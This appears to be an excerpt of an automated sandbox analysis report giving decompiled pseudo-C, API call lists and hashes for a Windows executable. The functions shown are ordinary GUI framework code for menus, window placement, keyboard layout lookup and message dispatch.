                                  0x0041f2ad
                                  0x0041f2b4
                                  0x0041f2b8
                                  0x0041f2b9
                                  0x0041f2cc
                                  0x0041f2cd
                                  0x0041f2d2
                                  0x0041f2d6
                                  0x0041f2d7
                                  0x0041f2e2
                                  0x0041f2e3
                                  0x0041f2e5
                                  0x0041f2ea
                                  0x0041f2eb
                                  0x0041f2eb
                                  0x0041f2a4
                                  0x0041f312
                                  0x0041f315
                                  0x0041f318
                                  0x0041f31d
                                  0x0041f320
                                  0x0041f321
                                  0x0041f323
                                  0x0041f328

                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 0041F25A
                                  • 72E7AD70.GDI32(?,00000068,00000000,0041F329,?,00000000), ref: 0041F276
                                  • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041F329,?,00000000), ref: 0041F295
                                  • 72E7AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0041F329,?,00000000), ref: 0041F2B9
                                  • 72E7AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0041F329), ref: 0041F2D7
                                  • 72E7AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 0041F2EB
                                  • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041F329,?,00000000), ref: 0041F30B
                                  • 72E7B380.USER32(00000000,?,0041F330,0041F329,?,00000000), ref: 0041F323
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: B380
                                  • String ID:
                                  • API String ID: 120756276-0
                                  • Opcode ID: 0c8ae948ccdd0cc1e4134a642f555508580253623807d761c58ee06e0a323977
                                  • Instruction ID: e4002b565367df740e72fffb50d85b4a1618d582a5525bca69be1438e7c1dba7
                                  • Opcode Fuzzy Hash: 0c8ae948ccdd0cc1e4134a642f555508580253623807d761c58ee06e0a323977
                                  • Instruction Fuzzy Hash: FE2186F1A40318AADB10DBA5CD81FAE73ACEB08704F5104A6FB09F71C1D6799E558B2C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004454A8, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 177windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E004454A8(void* __eax, void* __ebx, signed char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v8;
				signed char _v9;
				signed char _v10;
				struct tagMENUITEMINFOA _v58;
				char _v64;
				intOrPtr _t102;
				CHAR* _t108;
				signed char _t114;
				signed short _t147;
				void* _t152;
				intOrPtr _t158;
				intOrPtr _t174;
				struct HMENU__* _t176;
				int _t180;
				void* _t182;
				intOrPtr _t183;
				void* _t186;
				void* _t195;

				_t153 = __ecx;
				_v64 = 0;
				_v8 = 0;
				_v9 = __ecx;
				_t176 = __edx;
				_t152 = __eax;
				_push(_t186);
				_push(0x4456f9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t186 + 0xffffffc4;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t158);
					 *[fs:eax] = _t158;
					_push(0x445700);
					E0040411C( &_v64);
					return E0040411C( &_v8);
				}
				E004041B4( &_v8,  *((intOrPtr*)(__eax + 0x30)));
				if(E00447460(_t152) <= 0) {
					__eflags =  *(_t152 + 0x60);
					if( *(_t152 + 0x60) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t180 =  *(0x46eec0 + ((E00404528( *((intOrPtr*)(_t152 + 0x30)), 0x44571c) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *(0x46eeb4 + ( *(_t152 + 0x48) & 0x000000ff) * 4) |  *(0x46eea4 + ( *(_t152 + 0x38) & 0x000000ff) * 4) |  *(0x46eeac + ( *(_t152 + 0x39) & 0x000000ff) * 4) | 0x00000400;
							_t102 = E00447460(_t152);
							__eflags = _t102;
							if(_t102 <= 0) {
								InsertMenuA(_t176, 0xffffffff, _t180,  *(_t152 + 0x50) & 0x0000ffff, E004045DC(_v8));
							} else {
								_t108 = E004045DC( *((intOrPtr*)(_t152 + 0x30)));
								InsertMenuA(_t176, 0xffffffff, _t180 | 0x00000010, E004459AC(_t152), _t108);
							}
							goto L22;
						}
						_v58.cbSize = 0x2c;
						_v58.fMask = 0x3f;
						_t182 = E00447A20(_t152);
						if(_t182 == 0 ||  *((char*)(_t182 + 0x40)) == 0 && E00447034(_t152) == 0) {
							if( *((intOrPtr*)(_t152 + 0x4c)) == 0) {
								L14:
								_t114 = 0;
								goto L16;
							}
							_t195 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x4c)))) + 0x1c))();
							if(_t195 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t114 = 1;
							L16:
							_v10 = _t114;
							_v58.fType =  *(0x46eef4 + ((E00404528( *((intOrPtr*)(_t152 + 0x30)), 0x44571c) & 0xffffff00 | _t195 == 0x00000000) & 0x0000007f) * 4) |  *(0x46eeec + ( *(_t152 + 0x3d) & 0x000000ff) * 4) |  *(0x46eec8 + ( *(_t152 + 0x48) & 0x000000ff) * 4) |  *(0x46eefc + (_v9 & 0x000000ff) * 4) |  *(0x46ef04 + (_v10 & 0x000000ff) * 4);
							_v58.fState =  *(0x46eed4 + ( *(_t152 + 0x38) & 0x000000ff) * 4) |  *(0x46eee4 + ( *(_t152 + 0x39) & 0x000000ff) * 4) |  *(0x46eedc + ( *(_t152 + 0x3a) & 0x000000ff) * 4);
							_v58.wID =  *(_t152 + 0x50) & 0x0000ffff;
							_v58.hSubMenu = 0;
							_v58.hbmpChecked = 0;
							_v58.hbmpUnchecked = 0;
							_v58.dwTypeData = E004045DC(_v8);
							if(E00447460(_t152) > 0) {
								_v58.hSubMenu = E004459AC(_t152);
							}
							InsertMenuItemA(_t176, 0xffffffff, 0xffffffff,  &_v58);
							goto L22;
						}
					}
					_t183 =  *((intOrPtr*)(_t152 + 0x64));
					__eflags = _t183;
					if(_t183 == 0) {
						L7:
						_push(_v8);
						_push(0x445710);
						E00444AE8( *(_t152 + 0x60) & 0x0000ffff, _t152, _t153,  &_v64, _t183);
						_push(_v64);
						E0040449C();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t183 + 0x64));
					if( *((intOrPtr*)(_t183 + 0x64)) != 0) {
						goto L7;
					}
					_t174 =  *0x444374; // 0x4443c0
					_t147 = E00403524( *((intOrPtr*)(_t183 + 4)), _t174);
					__eflags = _t147;
					if(_t147 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v58.hSubMenu = E004459AC(_t152);
				goto L8;
			}





















                                  0x004454a8
                                  0x004454b3
                                  0x004454b6
                                  0x004454b9
                                  0x004454bc
                                  0x004454be
                                  0x004454c2
                                  0x004454c3
                                  0x004454c8
                                  0x004454cb
                                  0x004454d2
                                  0x004456db
                                  0x004456dd
                                  0x004456e0
                                  0x004456e3
                                  0x004456eb
                                  0x004456f8
                                  0x004456f8
                                  0x004454de
                                  0x004454ec
                                  0x004454fa
                                  0x004454ff
                                  0x00445544
                                  0x00445552
                                  0x00445694
                                  0x0044569c
                                  0x004456a1
                                  0x004456a3
                                  0x004456d6
                                  0x004456a5
                                  0x004456a8
                                  0x004456bd
                                  0x004456bd
                                  0x00000000
                                  0x004456a3
                                  0x00445558
                                  0x0044555f
                                  0x0044556d
                                  0x00445571
                                  0x00445588
                                  0x00445596
                                  0x00445596
                                  0x00000000
                                  0x00445596
                                  0x00445592
                                  0x00445594
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044559a
                                  0x0044559a
                                  0x0044559a
                                  0x0044559c
                                  0x0044559c
                                  0x004455e7
                                  0x0044560b
                                  0x00445612
                                  0x00445617
                                  0x0044561c
                                  0x00445621
                                  0x0044562c
                                  0x00445638
                                  0x00445641
                                  0x00445641
                                  0x0044564d
                                  0x00000000
                                  0x0044564d
                                  0x00445571
                                  0x00445501
                                  0x00445504
                                  0x00445506
                                  0x00445520
                                  0x00445520
                                  0x00445523
                                  0x0044552f
                                  0x00445534
                                  0x0044553f
                                  0x00000000
                                  0x0044553f
                                  0x00445508
                                  0x0044550c
                                  0x00000000
                                  0x00000000
                                  0x00445511
                                  0x00445517
                                  0x0044551c
                                  0x0044551e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044551e
                                  0x004454f5
                                  0x00000000

                                  APIs
                                  • GetVersion.KERNEL32(00000000,004456F9), ref: 00445544
                                  • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0044564D
                                    • Part of subcall function 004459AC: CreatePopupMenu.USER32(?,004456B5,00000000,00000000,004456F9), ref: 004459C7
                                  • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004456D6
                                    • Part of subcall function 004459AC: CreateMenu.USER32(?,004456B5,00000000,00000000,004456F9), ref: 004459D1
                                  • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004456BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Menu$Insert$Create$ItemPopupVersion
                                  • String ID: ,$?
                                  • API String ID: 2359071979-2308483597
                                  • Opcode ID: c67b352ac6dc60bb7ae42a4ee4d90cf118caf41a0ea880b20f70d63534e4a80f
                                  • Instruction ID: 74c3d08c6581f6807fd89a35689f61f32990ddafc1d6edc0ee199db7c4b24ff9
                                  • Opcode Fuzzy Hash: c67b352ac6dc60bb7ae42a4ee4d90cf118caf41a0ea880b20f70d63534e4a80f
                                  • Instruction Fuzzy Hash: B661CF70A04654ABEF10EF6AD88166A7BF5AF46304B44447BF940AA3A7E73CDD01CB19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043D1AC, Relevance: 10.7, APIs: 7, Instructions: 155COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E0043D1AC(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _t80;
				intOrPtr _t91;
				void* _t118;
				signed char _t119;
				intOrPtr _t135;
				intOrPtr _t144;
				void* _t147;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t118 = __ecx;
				_v8 = __eax;
				_t144 =  *0x46fda0; // 0x470b44
				 *((char*)(_v8 + 0x228)) = 1;
				_push(_t147);
				_push(0x43d387);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147 + 0xffffffe0;
				E00434BB4(_v8, __ecx, __ecx, _t144);
				_v16 = _v16 + 4;
				E00435E8C(_v8,  &_v28);
				if(E00453AAC() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E00453AAC() -  *(_v8 + 0x4c);
				}
				if(E00453AB8() <  *(_v8 + 0x48) + _v28) {
					_v28 = E00453AB8() -  *(_v8 + 0x48);
				}
				if(E00453AA0() > _v28) {
					_v28 = E00453AA0();
				}
				if(E00453A94() > _v16) {
					_v16 = E00453A94();
				}
				SetWindowPos(E0043BA58(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x22c)) > 0xfa && E004043DC(_t118) < 0x64 &&  *0x46ecec != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E00440938( &_v36);
							if(_v32 <= _v24) {
								_t119 = 1;
							} else {
								_t119 = 0;
							}
						} else {
							_t119 = 2;
						}
						 *0x46ecec(E0043BA58(_v8), 0x64,  *(0x46edf4 + (_t119 & 0x000000ff) * 4) | 0x00040000);
					}
				}
				_t80 =  *0x46fc50; // 0x470b40
				E00438CC8(_v8,  *((intOrPtr*)( *_t80 + 0x30)));
				ShowWindow(E0043BA58(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x80))();
				_pop(_t135);
				 *[fs:eax] = _t135;
				_push(0x43d38e);
				 *((intOrPtr*)(_v8 + 0x22c)) = GetTickCount();
				_t91 = _v8;
				 *((char*)(_t91 + 0x228)) = 0;
				return _t91;
			}

















                                  0x0043d1ba
                                  0x0043d1bb
                                  0x0043d1bc
                                  0x0043d1bd
                                  0x0043d1be
                                  0x0043d1c0
                                  0x0043d1c3
                                  0x0043d1cc
                                  0x0043d1d5
                                  0x0043d1d6
                                  0x0043d1db
                                  0x0043d1de
                                  0x0043d1e6
                                  0x0043d1eb
                                  0x0043d1f5
                                  0x0043d20c
                                  0x0043d21b
                                  0x0043d21b
                                  0x0043d230
                                  0x0043d23f
                                  0x0043d23f
                                  0x0043d24c
                                  0x0043d255
                                  0x0043d255
                                  0x0043d262
                                  0x0043d26b
                                  0x0043d26b
                                  0x0043d291
                                  0x0043d2a9
                                  0x0043d2d1
                                  0x0043d2da
                                  0x0043d2e9
                                  0x0043d2f2
                                  0x0043d300
                                  0x0043d30b
                                  0x0043d311
                                  0x0043d30d
                                  0x0043d30d
                                  0x0043d30d
                                  0x0043d2f4
                                  0x0043d2f4
                                  0x0043d2f4
                                  0x0043d32e
                                  0x0043d32e
                                  0x0043d2da
                                  0x0043d334
                                  0x0043d341
                                  0x0043d351
                                  0x0043d35b
                                  0x0043d363
                                  0x0043d366
                                  0x0043d369
                                  0x0043d376
                                  0x0043d37c
                                  0x0043d37f
                                  0x0043d386

                                  APIs
                                  • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,0043D387), ref: 0043D291
                                  • GetTickCount.KERNEL32 ref: 0043D296
                                  • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0043D2D1
                                  • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043D2E9
                                  • AnimateWindow.USER32(00000000,00000064,?), ref: 0043D32E
                                  • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,0043D387), ref: 0043D351
                                  • GetTickCount.KERNEL32 ref: 0043D36E
                                    • Part of subcall function 00440938: GetCursorPos.USER32(?), ref: 0044093C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                  • String ID:
                                  • API String ID: 3024527889-0
                                  • Opcode ID: 9d9a8a5f78f9b11540d033f4340f7ce0bca38c5b49737c3dc1b283e8e931efdd
                                  • Instruction ID: fcb178054d70579c5305c7faf103e6b77a2914487e238d35651c27c8870d5e55
                                  • Opcode Fuzzy Hash: 9d9a8a5f78f9b11540d033f4340f7ce0bca38c5b49737c3dc1b283e8e931efdd
                                  • Instruction Fuzzy Hash: D6515C34A00109EFDB10EFA9D986A9EB7F4EF48304F2051A6F940EB351D778AE44CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004565D0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004579D8: GetActiveWindow.USER32 ref: 004579FF
                                  • GetWindowRect.USER32 ref: 00456652
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0045668A
                                  • MessageBoxA.USER32 ref: 004566C9
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045673F,?,00000000,00456738), ref: 00456719
                                  • SetActiveWindow.USER32(00000000,0045673F,?,00000000,00456738), ref: 0045672A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$Active$MessageRect
                                  • String ID: (
                                  • API String ID: 3147912190-3887548279
                                  • Opcode ID: baeebc2037105bebb5a264d65a99cc5d457036e15943cdfc2575cd948c55bd71
                                  • Instruction ID: 03e1060d66c5c51507ac80292a07efda75e99edb015607856b5e8fcb500629f0
                                  • Opcode Fuzzy Hash: baeebc2037105bebb5a264d65a99cc5d457036e15943cdfc2575cd948c55bd71
                                  • Instruction Fuzzy Hash: 1E513AB5A00108AFDB00DBE9DD91FAEB7F8FB48305F55446AF900EB392D678AD048B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00453CFC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E00453CFC(intOrPtr __eax, void* __ebx, void* __fp0) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t129;

				_t129 = __fp0;
				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x453ea7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x453eae);
					return E0040411C( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E00403368(1);
					E0040411C(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x25)) = 0;
						E00415A34( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00440DA4( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E00408EF4( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x453e63);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E0040438C( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E0040438C(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x453e6a);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}





















                                  0x00453cfc
                                  0x00453cfd
                                  0x00453cff
                                  0x00453d08
                                  0x00453d0e
                                  0x00453d13
                                  0x00453d14
                                  0x00453d19
                                  0x00453d1c
                                  0x00453d26
                                  0x00453e88
                                  0x00453e90
                                  0x00453e93
                                  0x00453e96
                                  0x00453ea6
                                  0x00453d2c
                                  0x00453d3b
                                  0x00453d44
                                  0x00453d57
                                  0x00453d5a
                                  0x00453e77
                                  0x00453e7d
                                  0x00453e83
                                  0x00000000
                                  0x00453d60
                                  0x00453d61
                                  0x00453d6a
                                  0x00453d6d
                                  0x00453d79
                                  0x00000000
                                  0x00453d7f
                                  0x00453d91
                                  0x00453d97
                                  0x00453dc1
                                  0x00000000
                                  0x00453dc7
                                  0x00453dc9
                                  0x00453dca
                                  0x00453dcf
                                  0x00453dd2
                                  0x00453dd5
                                  0x00453dfb
                                  0x00453e0e
                                  0x00453e26
                                  0x00453e34
                                  0x00453e47
                                  0x00453e47
                                  0x00453e34
                                  0x00453e4e
                                  0x00453e51
                                  0x00453e54
                                  0x00453e62
                                  0x00453e62
                                  0x00453dc1
                                  0x00000000
                                  0x00453e6a
                                  0x00453e6a
                                  0x00453e6e
                                  0x00453e6e
                                  0x00453e6e
                                  0x00000000
                                  0x00453d6d
                                  0x00453d5a
                                  0x00000000

                                  APIs
                                  • GetKeyboardLayoutList.USER32(00000040,?,00000000,00453EA7,?,00000000,?,00453F09,00000000,?,00437273), ref: 00453D52
                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00453DBA
                                  • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,00453E63,?,80000002,00000000), ref: 00453DF4
                                  • RegCloseKey.ADVAPI32(?,00453E6A,00000000,?,00000100,00000000,00453E63,?,80000002,00000000), ref: 00453E5D
                                  Strings
                                  • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00453DA4
                                  • layout text, xrefs: 00453DEB
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CloseKeyboardLayoutListOpenQueryValue
                                  • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                  • API String ID: 1703357764-2652665750
                                  • Opcode ID: 4224ee4b62b2ee05c33a1dc4bc5c3429725c5e52e80da33e0a0958a3a6363b84
                                  • Instruction ID: 86c4c94e0474dfddcbcfd8384168408c5acf329df256b04f42af95032648c71e
                                  • Opcode Fuzzy Hash: 4224ee4b62b2ee05c33a1dc4bc5c3429725c5e52e80da33e0a0958a3a6363b84
                                  • Instruction Fuzzy Hash: B1416D74A002099FDB11DF95C982BDEB7F8EB48705F5040A6E904EB392D778AF44CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045613C, Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E0045613C(void* __eax, char* __ecx, struct tagMSG* __edx) {
				char _v19;
				char _t12;
				int _t13;
				void* _t14;
				int _t30;
				int _t32;
				MSG* _t42;
				void* _t43;
				char* _t45;

				_t33 = __ecx;
				_push(__ecx);
				_t42 = __edx;
				_t43 = __eax;
				_t32 = 0;
				if(PeekMessageA(__edx, 0, 0, 0, 0) != 0) {
					 *_t45 = _t12;
					if( *_t45 == 0) {
						_t13 = PeekMessageA(_t42, 0, 0, 0, 1);
						asm("sbb eax, eax");
						_t14 = _t13 + 1;
					} else {
						_t30 = PeekMessageW(_t42, 0, 0, 0, 1);
						asm("sbb eax, eax");
						_t14 = _t30 + 1;
					}
					if(_t14 != 0) {
						_t32 = 1;
						if(_t42->message == 0x12) {
							 *((char*)(_t43 + 0xa4)) = 1;
						} else {
							_v19 = 0;
							if( *((short*)(_t43 + 0x102)) != 0) {
								_t33 =  &_v19;
								 *((intOrPtr*)(_t43 + 0x100))();
							}
							if(E00457BB4(_t43, _t33, _t42) == 0 && E00456000(_t43, _t42) == 0 && _v19 == 0 && E00455EF8(_t43, _t42) == 0 && E00455F48(_t43, _t33, _t42) == 0 && E00455ED4(_t43, _t42) == 0) {
								TranslateMessage(_t42);
								if( *_t45 == 0) {
									DispatchMessageA(_t42);
								} else {
									DispatchMessageW(_t42);
								}
							}
						}
					}
				}
				return _t32;
			}












                                  0x0045613c
                                  0x00456140
                                  0x00456141
                                  0x00456143
                                  0x00456145
                                  0x00456157
                                  0x00456173
                                  0x0045617a
                                  0x0045619b
                                  0x004561a3
                                  0x004561a5
                                  0x0045617c
                                  0x00456185
                                  0x0045618d
                                  0x0045618f
                                  0x0045618f
                                  0x004561a8
                                  0x004561ae
                                  0x004561b4
                                  0x0045623f
                                  0x004561ba
                                  0x004561ba
                                  0x004561c7
                                  0x004561c9
                                  0x004561d5
                                  0x004561d5
                                  0x004561e6
                                  0x00456224
                                  0x0045622d
                                  0x00456238
                                  0x0045622f
                                  0x00456230
                                  0x00456230
                                  0x0045622d
                                  0x004561e6
                                  0x004561b4
                                  0x004561a8
                                  0x0045624d

                                  APIs
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00456150
                                  • IsWindowUnicode.USER32 ref: 00456164
                                  • PeekMessageW.USER32 ref: 00456185
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0045619B
                                  • TranslateMessage.USER32 ref: 00456224
                                  • DispatchMessageW.USER32 ref: 00456230
                                  • DispatchMessageA.USER32 ref: 00456238
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                  • String ID:
                                  • API String ID: 2190272339-0
                                  • Opcode ID: 2aa04e25466a50641bf453fa97dfb48c568b1f1bbc39b2ea5547bc5fb7e1b9df
                                  • Instruction ID: f3296ffb22f40036ad4d1b2552db24988b935ea516c4903b01a3ba2daeff3033
                                  • Opcode Fuzzy Hash: 2aa04e25466a50641bf453fa97dfb48c568b1f1bbc39b2ea5547bc5fb7e1b9df
                                  • Instruction Fuzzy Hash: 85210C3130474026EA3176290E42B7F52954F9174BF5684AFFD81A73C3D6AD988E411E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00421764, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E00421764(void* __eax, void* __edx, void* __fp0) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				struct HDC__* _t43;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t77;
				void* _t80;
				void* _t83;
				void* _t85;
				intOrPtr _t86;

				_t83 = _t85;
				_t86 = _t85 + 0xffffffdc;
				_t80 = __edx;
				_t65 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E00402D4C( &_v38, 0x16);
					_t67 =  *((intOrPtr*)(_t65 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *(_t67 + 0x18) & 0x0000ffff;
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_t43 = E0041FA3C( &_v38);
					_v18 = _t43;
					_push(0);
					L004066E4();
					_v16 = _t43;
					_push(_t83);
					_push(0x42189f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
					_v8 = E004026E4(_v12);
					_push(_t83);
					_push(0x42187f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
						E0041EC2C(_t67);
					}
					E00415DA8(_t80, 0x16,  &_v38);
					E00415DA8(_t80, _v12, _v8);
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x421886);
					return E00402704(_v8);
				}
			}






















                                  0x00421765
                                  0x00421767
